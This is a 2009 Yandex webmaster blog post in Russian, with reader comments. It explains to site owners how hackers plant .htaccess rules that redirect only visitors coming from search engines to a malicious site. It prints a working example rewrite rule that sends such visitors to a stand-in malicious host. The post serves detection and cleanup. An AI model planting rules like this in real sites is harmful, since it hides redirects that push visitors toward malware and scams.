Блог Яндекса для вебмастеров

"Ты туда не ходи, ты сюда ходи!"

2 июня 2009, 17:59

Если человек бежит, расталкивая локтями прохожих, спотыкаясь на ступеньках и не здороваясь, ему кричат вдогонку: «Куда ты?!..»
А он не отвечает и бежит, шлепая по лужам, шумно дыша и устремив вперед невидящий безумный взгляд. Ему орут: «Куда ты?!..»
А его нужно взять за рукав и тихо, душевно спросить:
«Откуда ты?»

А. Кнышев


После того, как Яндекс начал предупреждать пользователей и вебмастеров о зараженных сайтах, мы стали тщательно анализировать обращения в службу поддержки, чтобы понять, какие именно случаи заражения встречаются чаще всего и как можно помочь веб-мастерам их исправить. Одна проблема вызывала больше всего трудностей, расскажем о ней подробнее.

Многие веб-мастера не могут найти в коде своего сайта вредоносный код. И это не удивительно, потому что его там нет. Однако, это не означает, что переход на сайт для конечного пользователя безопасен. Существует схема заражения, при которой пользователь не доходит до настоящего содержимого сайта, так как его уже при первом обращении к серверу автоматически перенаправляют на страницу, указанную злоумышленниками.

Часто редирект осуществляется только при переходе со строго определенных ресурсов, например, поисковых систем или крупных каталогов. Это позволяет злоумышленникам дольше скрывать от веб-мастера факт того, что его сайт взломан. Владельцы сайтов, в отличие от большинства посетителей, чаще всего заходят на свой сайт, вводя его адрес в адресной строке браузера, а не переходя на него с поисковых систем. Поэтому они не видят, что их сайт не в порядке, и могут долгое время не знать о проблемах.


Реализуется такое перенаправление нехитро, в файл .htaccess прописывается примерно такой код:

/** .htaccess **/
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteRule .* httр://vredonosnyj-sajt.net.ru/ [R,L]


В данном случае все пользователи, пришедшие на сайт по ссылкам с Яндекса, Рамблера и Google будут перенаправлены на httр://vredonosnyj-sajt.net.ru/, а во всех остальных случаях посетителям будет показано нормальное содержимое сайта.

Как правило, подменяются файлы .htaccess всех поддиректорий сайта, а не только корневой, а получение доступа к файлу может происходить способом, описанным нами ранее. Аналогичное поведение может быть реализовано и обычным внедряемым в страницу java-скриптом. Но в этом случае вредоносный скрипт будет виден при анализе кода зараженного сайта, просто он будет срабатывать только при переходе из поиска.

Ресурс, который показывается пользователю вместо исходного сайта, может содержать рекламу, порнографию или эксплойт -- все, что угодно злоумышленникам.

В последнее время таким образом все чаще распространяются "фальшивые антивирусы", создающие видимость проверки компьютера пользователя на вирусы и предлагающие активировать полную версию программы за деньги.

Сайты с таким перенаправлением считаются вредоносными, обнаруживаются Яндексом и помечаются в результатах поиска. При этом веб-мастер сайта, который зарегистрировался в службе Я.Вебмастер, получает уведомление, что на его сайте находится вредоносный код. Надеемся, что теперь такие случаи не уйдут от взгляда веб-мастеров.


Группа пролетарского гнева

20 комментариев
Андрей Смирнов
2 июня 2009, 18:13
Нам нужно становиться менее доверчивыми ))!!
Нет, просто нужно купить антивирус...
Андрей Смирнов
23 июня 2009, 11:05
Антивирус - не панацея.. тем более купленный...
Если брать всякие баннеры, трояны на явескрипт и прочее, то есть более простые и действенные методы...
Я вчера как раз такой сайт нашла в поиске. Я его искала через яндекс, хотела туда зайти, а мне анписали, что не стоит, т.к. он предположительно заражен. Я заходить не стала,а вот вопрос: заражен ли? Не может быть такого, что Яндекс пометит нормальный сайт?
Вероятность ошибки очень мала. Если сайт размечен, а вы уверены, что вируса там нет, сообщите об этом в службу поддержки. Мы проверим как можно скорее.
Уже сообщили.
Через 301 редирект было переадресование на наше зеркало сайта, которое также было прописано и в robots.txt.
Со вчерашнего дня в логах начал находить, что "Сайт  возможно заражен"
Ошибки судя по всему есть. Вот эту страницу http://www.billow.ru/cash/news1/ib1002_01457.html посчитали "зараженной". Техподдерка отреагировала весьма "адекватно" - прислали ссылки на help. Причем, судя по всему, даже по ссылке не прошла...
Да, Гугл даже не намекает на это :) FireFox тоже пропускает.

Яндекс, проверяйте алгоритмы.
А как изменить .htaccess если на него права 644 и его создал я а не скрипт? Его со стороны, даже заменить не получится. Если же со стороны сервера дыра "жул" защёл через неё, то зачем такая сложная тема с заменой .htaccess, можно намного проще и безопасней внедрить чужой код куда хочешь. Моё мнение.
Лучше бы вы поиск нормальный сделали, а то в выдаче один мусор остался, да ещё и с вирусами сайты повылазили в топы. Своими фильтрами положили кучу нормальных сайтов и не чешитесь.
По каким запросам мусор? И приведите, пожалуйста, примеры нормальных сайтов.
Ладно, частный случай, сайт avatarko.ru под фильтром "Ты последний" уже больше полугода, сайт развиваю, движок с нуля писал сам, пополняю каждый день, много авторских работ, блоги пользователей, есть практически уникальная в рунете фишка с виртуальными интернет питомцами. Да уже и перестал пользоваться Яндексом практически, "php задержка" на первой строчке ваш диагноз.
Спасибо за примеры.
Напишите еще про iframe
Очень часто, даже очень добрые сайты где-нибудь цепляют заразу и у них там айфрейм на какой-нибудь гумблар.цн стоит.
действительно, в 9-ти случаях из 10-ти, проходя по ссылке попадаешь на порно сайты... надоело!
супер, спасибо за инфу
У меня была трабла с .htaccess. Гады прописали переадресации. удалил файл, он был ими подослан.
Если у Яндекса есть способ поиска вредоносного ПО, как можно попросить поисковик просканировать свои страницы? Ну, чтобы сомнения в чистоте своего сайта улеглись...
Слей на машину через ФТП индекс и .htaccess. Антвирус закричит если с индексом что-то не так. А .htaccess смотреть самому нужно.
инфа просто супер полезная! Теперь я понял, что у меня было... Спасибо.
По поводу нет-антивирусов. Сколько ни пользовался - все бестолку, пока сам не найдешь кусок кода, никто тебе его не найдет. Причем, как ни странно, почти всегда он лежит глубоко в подвале сайта.